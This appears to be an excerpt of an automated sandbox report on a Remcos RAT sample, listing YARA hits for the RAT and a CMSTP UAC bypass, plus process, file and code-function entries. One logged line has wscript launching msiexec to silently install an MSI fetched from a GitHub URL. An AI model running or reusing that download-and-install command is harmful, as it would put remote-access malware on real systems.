                      Source: 8.2.cmd.exe.5294b90.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.EHttpSrv.exe.2399a18.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.4b91b90.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.EHttpSrv.exe.2367ee4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.2.EHttpSrv.exe.23e12e4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.EHttpSrv.exe.2345a18.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.2.EHttpSrv.exe.23bfa18.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.EHttpSrv.exe.25856c4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 23.2.EHttpSrv.exe.25a6f90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.5016b90.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.2c007f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.2.EHttpSrv.exe.23e1ee4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.EHttpSrv.exe.24f9b90.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.4c016c4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.EHttpSrv.exe.23672e4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.EHttpSrv.exe.24f8f90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 29.2.EHttpSrv.exe.242dee4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.cmd.exe.33007f8.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.4b90f90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.EHttpSrv.exe.24d76c4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.cmd.exe.5293f90.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.cmd.exe.52726c4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.cmd.exe.4c23b90.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 25.2.cmd.exe.2bd4848.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.cmd.exe.4ff46c4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000020.00000002.3108485798.000000000047B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000017.00000002.2755264970.000000000047B000.00000004.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qnJump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E86020 NtProtectVirtualMemory,NtProtectVirtualMemory,7_2_62E86020
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_004016E0 GetCommandLineW,OpenSCManagerW,wcsstr,OpenServiceW,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,6_2_004016E0
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_0040320C
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIACD9.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3BAC.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C2A.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C5A.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C7A.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3CC9.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI3BAC.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_204660B06_2_204660B0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_204139506_2_20413950
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_2041C9A06_2_2041C9A0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_204211A06_2_204211A0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_20403A706_2_20403A70
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_20464B406_2_20464B40
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_20405C106_2_20405C10
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_20462D506_2_20462D50
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_2041AD006_2_2041AD00
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_20405DB06_2_20405DB0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_2040EE606_2_2040EE60
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_204276C06_2_204276C0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_204677F06_2_204677F0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_204157B06_2_204157B0
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_00404A447_2_00404A44
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_00406F547_2_00406F54
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_0040677D7_2_0040677D
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E81A107_2_62E81A10
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E8AB407_2_62E8AB40
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E8770C7_2_62E8770C
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E837047_2_62E83704
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E818B87_2_62E818B8
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E914207_2_62E91420
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_204660B015_2_204660B0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_2041395015_2_20413950
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_2041C9A015_2_2041C9A0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_204211A015_2_204211A0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_20403A7015_2_20403A70
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_20464B4015_2_20464B40
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_20405C1015_2_20405C10
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_20462D5015_2_20462D50
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_20405DB015_2_20405DB0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_2040EE6015_2_2040EE60
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_204276C015_2_204276C0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_20464FC015_2_20464FC0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_204677F015_2_204677F0
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_204157B015_2_204157B0
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe EFFA6FCB8759375B4089CCF61202A5C63243F4102872E64E3EB0A1BDC2727659
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll A91F13AECE1EA7EBE326F0E340BDA9D00613D3365CD81B7F138A4C9446FFBD38
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: String function: 20402000 appears 58 times
                      Source: secondaryTask.vbsInitial sample: Strings found which are bigger than 50
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"
                      Source: zlib1.dll.7.drStatic PE information: Number of sections : 11 > 10
                      Source: 8.2.cmd.exe.33007f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.3302800.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 29.2.EHttpSrv.exe.242d2e4.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.cmd.exe.4c22f90.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 29.2.EHttpSrv.exe.240ba18.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.4b6f6c4.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.EHttpSrv.exe.23bbee4.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.EHttpSrv.exe.23bb2e4.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.EHttpSrv.exe.25a7b90.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.5015f90.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.5294b90.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.EHttpSrv.exe.2399a18.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.4b91b90.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.EHttpSrv.exe.2367ee4.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.2.EHttpSrv.exe.23e12e4.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.EHttpSrv.exe.2345a18.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.2.EHttpSrv.exe.23bfa18.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.EHttpSrv.exe.25856c4.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 23.2.EHttpSrv.exe.25a6f90.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.5016b90.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.2c007f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.2.EHttpSrv.exe.23e1ee4.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.EHttpSrv.exe.24f9b90.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.cmd.exe.4c016c4.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.EHttpSrv.exe.23672e4.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.EHttpSrv.exe.24f8f90.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 29.2.EHttpSrv.exe.242dee4.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.33007f8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 25.2.cmd.exe.4b90f90.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.EHttpSrv.exe.24d76c4.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.5293f90.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 8.2.cmd.exe.52726c4.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
